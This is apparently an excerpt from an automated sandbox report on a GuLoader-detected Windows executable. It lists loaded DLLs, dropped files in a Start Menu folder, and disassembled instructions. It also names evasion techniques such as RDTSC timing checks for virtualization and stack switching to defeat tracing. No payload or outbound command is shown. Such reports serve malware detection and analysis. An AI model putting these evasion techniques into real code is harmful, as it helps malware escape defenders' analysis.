      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Ntwph4urc1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Ntwph4urc1.exe, 00000009.00000001.1842784035.0000000000649000.00000008.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: Ntwph4urc1.exe, 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000003.2275206703.00000000365BD000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000003.2277143725.000000003676F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Ntwph4urc1.exe, Ntwph4urc1.exe, 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000003.2275206703.00000000365BD000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000003.2277143725.000000003676F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Ntwph4urc1.exe, 00000009.00000001.1842784035.0000000000649000.00000008.00000001.01000000.00000006.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000005.00000002.1847253587.000000000507C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 5_2_74351B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,5_2_74351B5F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3692135D push eax; iretd 9_2_36921369
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369227FA pushad ; ret 9_2_369227F9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3692225F pushad ; ret 9_2_369227F9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3692283D push eax; iretd 9_2_36922858
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369509AD push ecx; mov dword ptr [esp], ecx9_2_369509B6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile created: C:\Users\user\AppData\Local\Temp\nszB5C8.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspiresJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Vaabenstyringssystemernes.WarJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Sulfoforbindelserne.chlJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Umpiress240.bivJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\potmaker.stiJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeAPI/Special instruction interceptor: Address: 58B806C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeAPI/Special instruction interceptor: Address: 29A806C
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeRDTSC instruction interceptor: First address: 587AAC2 second address: 587AAC2 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FA4912AC715h 0x00000006 cmp ah, FFFFFFE4h 0x00000009 cmp ch, ah 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeRDTSC instruction interceptor: First address: 296AAC2 second address: 296AAC2 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FA490DA4C15h 0x00000006 cmp ah, FFFFFFE4h 0x00000009 cmp ch, ah 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369CD1C0 rdtsc 9_2_369CD1C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszB5C8.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeAPI coverage: 0.1 %
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 5_2_0040674C FindFirstFileW,FindClose,5_2_0040674C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 5_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405B00
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 5_2_00402902 FindFirstFileW,5_2_00402902
      Source: Ntwph4urc1.exe, 00000009.00000003.2275454496.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000003.2275603811.00000000069CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW)J5
      Source: Ntwph4urc1.exe, 00000009.00000003.2275454496.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000002.2624930358.0000000006968000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000009.00000003.2275603811.00000000069CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeAPI call chain: ExitProcess graph end nodegraph_5-4303
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeAPI call chain: ExitProcess graph end nodegraph_5-4455
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369CD1C0 rdtsc 9_2_369CD1C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369935C0 NtCreateMutant,LdrInitializeThunk,9_2_369935C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 5_2_74351B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,5_2_74351B5F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D368C mov eax, dword ptr fs:[00000030h]9_2_369D368C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D368C mov eax, dword ptr fs:[00000030h]9_2_369D368C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D368C mov eax, dword ptr fs:[00000030h]9_2_369D368C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D368C mov eax, dword ptr fs:[00000030h]9_2_369D368C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369476B2 mov eax, dword ptr fs:[00000030h]9_2_369476B2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369476B2 mov eax, dword ptr fs:[00000030h]9_2_369476B2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369476B2 mov eax, dword ptr fs:[00000030h]9_2_369476B2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694D6AA mov eax, dword ptr fs:[00000030h]9_2_3694D6AA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694D6AA mov eax, dword ptr fs:[00000030h]9_2_3694D6AA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0D6F0 mov eax, dword ptr fs:[00000030h]9_2_36A0D6F0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695B6C0 mov eax, dword ptr fs:[00000030h]9_2_3695B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695B6C0 mov eax, dword ptr fs:[00000030h]9_2_3695B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695B6C0 mov eax, dword ptr fs:[00000030h]9_2_3695B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695B6C0 mov eax, dword ptr fs:[00000030h]9_2_3695B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695B6C0 mov eax, dword ptr fs:[00000030h]9_2_3695B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695B6C0 mov eax, dword ptr fs:[00000030h]9_2_3695B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369816CF mov eax, dword ptr fs:[00000030h]9_2_369816CF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0F6C7 mov eax, dword ptr fs:[00000030h]9_2_36A0F6C7
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A116CC mov eax, dword ptr fs:[00000030h]9_2_36A116CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A116CC mov eax, dword ptr fs:[00000030h]9_2_36A116CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A116CC mov eax, dword ptr fs:[00000030h]9_2_36A116CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A116CC mov eax, dword ptr fs:[00000030h]9_2_36A116CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E36EE mov eax, dword ptr fs:[00000030h]9_2_369E36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E36EE mov eax, dword ptr fs:[00000030h]9_2_369E36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E36EE mov eax, dword ptr fs:[00000030h]9_2_369E36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E36EE mov eax, dword ptr fs:[00000030h]9_2_369E36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E36EE mov eax, dword ptr fs:[00000030h]9_2_369E36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369E36EE mov eax, dword ptr fs:[00000030h]9_2_369E36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697D6E0 mov eax, dword ptr fs:[00000030h]9_2_3697D6E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697D6E0 mov eax, dword ptr fs:[00000030h]9_2_3697D6E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369836EF mov eax, dword ptr fs:[00000030h]9_2_369836EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36953616 mov eax, dword ptr fs:[00000030h]9_2_36953616
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36953616 mov eax, dword ptr fs:[00000030h]9_2_36953616
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A25636 mov eax, dword ptr fs:[00000030h]9_2_36A25636
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698F603 mov eax, dword ptr fs:[00000030h]9_2_3698F603
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36981607 mov eax, dword ptr fs:[00000030h]9_2_36981607
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h]9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h]9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h]9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h]9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h]9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h]9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h]9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h]9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F626 mov eax, dword ptr fs:[00000030h]9_2_3694F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36989660 mov eax, dword ptr fs:[00000030h]9_2_36989660
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36989660 mov eax, dword ptr fs:[00000030h]9_2_36989660
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369ED660 mov eax, dword ptr fs:[00000030h]9_2_369ED660
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A237B6 mov eax, dword ptr fs:[00000030h]9_2_36A237B6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697D7B0 mov eax, dword ptr fs:[00000030h]9_2_3697D7B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0F78A mov eax, dword ptr fs:[00000030h]9_2_36A0F78A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h]9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h]9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h]9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h]9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h]9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h]9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h]9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h]9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694F7BA mov eax, dword ptr fs:[00000030h]9_2_3694F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DF7AF mov eax, dword ptr fs:[00000030h]9_2_369DF7AF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DF7AF mov eax, dword ptr fs:[00000030h]9_2_369DF7AF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DF7AF mov eax, dword ptr fs:[00000030h]9_2_369DF7AF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DF7AF mov eax, dword ptr fs:[00000030h]9_2_369DF7AF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DF7AF mov eax, dword ptr fs:[00000030h]9_2_369DF7AF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D97A9 mov eax, dword ptr fs:[00000030h]9_2_369D97A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369557C0 mov eax, dword ptr fs:[00000030h]9_2_369557C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369557C0 mov eax, dword ptr fs:[00000030h]9_2_369557C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369557C0 mov eax, dword ptr fs:[00000030h]9_2_369557C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695D7E0 mov ecx, dword ptr fs:[00000030h]9_2_3695D7E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698F71F mov eax, dword ptr fs:[00000030h]9_2_3698F71F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698F71F mov eax, dword ptr fs:[00000030h]9_2_3698F71F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A1972B mov eax, dword ptr fs:[00000030h]9_2_36A1972B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A0F72E mov eax, dword ptr fs:[00000030h]9_2_36A0F72E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36957703 mov eax, dword ptr fs:[00000030h]9_2_36957703
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36955702 mov eax, dword ptr fs:[00000030h]9_2_36955702
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36955702 mov eax, dword ptr fs:[00000030h]9_2_36955702
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A2B73C mov eax, dword ptr fs:[00000030h]9_2_36A2B73C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A2B73C mov eax, dword ptr fs:[00000030h]9_2_36A2B73C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A2B73C mov eax, dword ptr fs:[00000030h]9_2_36A2B73C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A2B73C mov eax, dword ptr fs:[00000030h]9_2_36A2B73C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949730 mov eax, dword ptr fs:[00000030h]9_2_36949730
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36949730 mov eax, dword ptr fs:[00000030h]9_2_36949730
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36985734 mov eax, dword ptr fs:[00000030h]9_2_36985734
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695973A mov eax, dword ptr fs:[00000030h]9_2_3695973A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695973A mov eax, dword ptr fs:[00000030h]9_2_3695973A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36953720 mov eax, dword ptr fs:[00000030h]9_2_36953720
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696F720 mov eax, dword ptr fs:[00000030h]9_2_3696F720
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696F720 mov eax, dword ptr fs:[00000030h]9_2_3696F720
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696F720 mov eax, dword ptr fs:[00000030h]9_2_3696F720
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F375F mov eax, dword ptr fs:[00000030h]9_2_369F375F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F375F mov eax, dword ptr fs:[00000030h]9_2_369F375F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F375F mov eax, dword ptr fs:[00000030h]9_2_369F375F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F375F mov eax, dword ptr fs:[00000030h]9_2_369F375F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F375F mov eax, dword ptr fs:[00000030h]9_2_369F375F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36963740 mov eax, dword ptr fs:[00000030h]9_2_36963740
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36963740 mov eax, dword ptr fs:[00000030h]9_2_36963740
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36963740 mov eax, dword ptr fs:[00000030h]9_2_36963740
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A23749 mov eax, dword ptr fs:[00000030h]9_2_36A23749
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694B765 mov eax, dword ptr fs:[00000030h]9_2_3694B765
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694B765 mov eax, dword ptr fs:[00000030h]9_2_3694B765
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694B765 mov eax, dword ptr fs:[00000030h]9_2_3694B765
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694B765 mov eax, dword ptr fs:[00000030h]9_2_3694B765
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36959486 mov eax, dword ptr fs:[00000030h]9_2_36959486
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36959486 mov eax, dword ptr fs:[00000030h]9_2_36959486
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694B480 mov eax, dword ptr fs:[00000030h]9_2_3694B480
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369474B0 mov eax, dword ptr fs:[00000030h]9_2_369474B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369474B0 mov eax, dword ptr fs:[00000030h]9_2_369474B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369834B0 mov eax, dword ptr fs:[00000030h]9_2_369834B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36A254DB mov eax, dword ptr fs:[00000030h]9_2_36A254DB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369F94E0 mov eax, dword ptr fs:[00000030h]9_2_369F94E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369D7410 mov eax, dword ptr fs:[00000030h]9_2_369D7410
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697340D mov eax, dword ptr fs:[00000030h]9_2_3697340D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FB450 mov eax, dword ptr fs:[00000030h]9_2_369FB450
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FB450 mov eax, dword ptr fs:[00000030h]9_2_369FB450
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FB450 mov eax, dword ptr fs:[00000030h]9_2_369FB450
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369FB450 mov eax, dword ptr fs:[00000030h]9_2_369FB450
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695B440 mov eax, dword ptr fs:[00000030h]9_2_3695B440
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695B440 mov eax, dword ptr fs:[00000030h]9_2_3695B440
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695B440 mov eax, dword ptr fs:[00000030h]9_2_3695B440
